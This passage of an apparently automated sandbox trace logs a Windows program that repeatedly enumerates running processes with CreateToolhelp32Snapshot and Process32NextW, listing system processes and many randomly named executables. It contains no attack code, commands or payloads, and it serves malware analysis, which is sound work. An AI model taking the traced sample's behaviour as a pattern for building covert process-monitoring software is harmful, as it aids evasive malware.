szExeFile="svchost.exe")) returned 1 [0145.020] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0145.021] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.022] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.024] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0145.025] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0145.026] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0145.027] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.028] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.029] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0145.031] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0145.032] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0145.033] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0145.034] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0145.035] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0145.036] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0145.038] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0145.039] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0145.041] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0145.042] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0145.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0145.071] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0145.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0145.074] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0145.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0145.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0145.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0145.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0145.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0145.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.082] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0145.083] CloseHandle (hObject=0xc4) returned 1 [0145.083] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0145.088] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.089] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0145.090] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0145.091] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.091] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0145.092] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0145.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0145.094] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0145.095] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0145.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0145.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.100] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0145.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.103] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0145.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.153] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.154] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0145.156] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0145.157] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0145.158] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.160] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0145.161] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0145.162] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0145.163] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0145.164] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0145.165] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0145.167] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0145.168] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0145.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0145.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0145.172] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0145.173] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0145.174] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0145.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0145.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0145.179] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0145.180] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0145.181] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0145.183] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0145.184] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0145.185] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0145.187] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0145.188] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0145.189] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0145.190] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0145.192] CloseHandle (hObject=0xbc) returned 1 [0145.192] Sleep (dwMilliseconds=0x12c) [0145.518] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0145.522] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.523] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 